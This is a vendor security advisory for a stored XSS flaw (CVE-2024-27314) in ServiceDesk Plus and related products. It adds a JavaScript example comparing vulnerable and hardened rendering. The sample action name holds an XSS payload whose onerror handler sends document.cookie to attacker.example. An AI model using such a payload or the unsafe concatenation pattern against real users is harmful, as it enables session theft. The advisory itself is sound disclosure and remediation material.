CVE ID : CVE-2024-27314
Product Name | Severity | Affected Version(s) | Fixed Version | Fixed On |
---|---|---|---|---|
ServiceDesk Plus | Low | 14720 and below | 14730 | May 2, 2024 |
ServiceDesk Plus MSP | Low | 14710 and below | 14720 | May 22, 2024 |
SupportCenter Plus | Low | 14710 and below | 14720 | May 22, 2024 |
Details
A stored cross-site scripting (XSS) vulnerability allowed users with the SDAdmin role to inject malicious JavaScript into the Custom Actions menu on the request details page. The injected script executes in the browser of any user who opens a request, accesses the custom menu, and clicks the button whose action type is Execute script.
We fixed the issue by encoding the stored data during client-side rendering, so the browser treats it as text and the injected JavaScript is not executed.
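The following is an added illustration, not ManageEngine's code: a minimal string-based model of a client-side renderer for a custom actions menu, shown first in the vulnerable form (attacker-controlled fields concatenated straight into markup) and then in the hardened form (HTML-encoded at render time, with the script body kept out of the markup entirely). The field names `name`, `actionType`, `scriptBody` and `id`, the `executeScript` handler and the sample payload are assumptions made for the example.

```javascript
// Added example, not code from ServiceDesk Plus. Field names and the
// executeScript() handler are assumptions; the payload is constructed.

// Characters that change meaning in an HTML text or attribute context.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Single-pass replacement: '&' is handled by the same regex as the others,
// so already-encoded input is never double-encoded by a second pass here.
function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed attacker input: an SDAdmin stores this as the action name.
// Any user who opens the custom menu would render it.
const SAMPLE_ACTION = {
  id: 42,
  name: 'Escalate<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  actionType: "Execute script",
  scriptBody: "notifyTeam()",
};

// VULNERABLE: markup built by concatenation. The stored name lands in the
// page as live HTML, and the script body is inlined into an event handler.
function renderCustomActionUnsafe(action) {
  return (
    `<li class="custom-action" data-type="${action.actionType}">` +
    `<button onclick="executeScript('${action.scriptBody}')">${action.name}</button>` +
    `</li>`
  );
}

// HARDENED: every attacker-reachable field is HTML-encoded for the context
// it is written into, and the script body never appears in the markup; the
// click handler looks the action up by its (encoded) id instead.
function renderCustomActionSafe(action) {
  return (
    `<li class="custom-action" data-type="${htmlEncode(action.actionType)}" ` +
    `data-action-id="${htmlEncode(action.id)}">` +
    `<button class="custom-action-btn">${htmlEncode(action.name)}</button>` +
    `</li>`
  );
}

// Quick check a reviewer can run: does the rendered markup still contain an
// unencoded tag opener followed by a tag name?
function containsLiveTag(html, tagName) {
  return new RegExp(`<${tagName}\\b`, "i").test(html);
}

// Stand-alone run: show both renderings side by side.
console.log("unsafe:", renderCustomActionUnsafe(SAMPLE_ACTION));
console.log("safe:  ", renderCustomActionSafe(SAMPLE_ACTION));
```

In real DOM code the same principle applies with `textContent` and `setAttribute` instead of `innerHTML` or string concatenation; the encoding must match the sink (HTML text, attribute, URL, JavaScript string), which is why the hardened renderer avoids the inline event handler rather than trying to escape a script body into one.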
Impact
The vulnerability can be exploited by threat actors who hold the SDAdmin role to run script in the browser of any other user who opens the affected request and triggers the custom action, and to use that foothold for further attacks against those users' sessions.
Steps to upgrade
Acknowledgements
This vulnerability was reported by Fabrizio on our bug bounty portal.
If you have any questions or concerns, please contact product support at the email addresses below.
ServiceDesk Plus: support@servicedeskplus.com
ServiceDesk Plus MSP: support@servicedeskplusmsp.com
SupportCenter Plus: support@supportcenterplus.com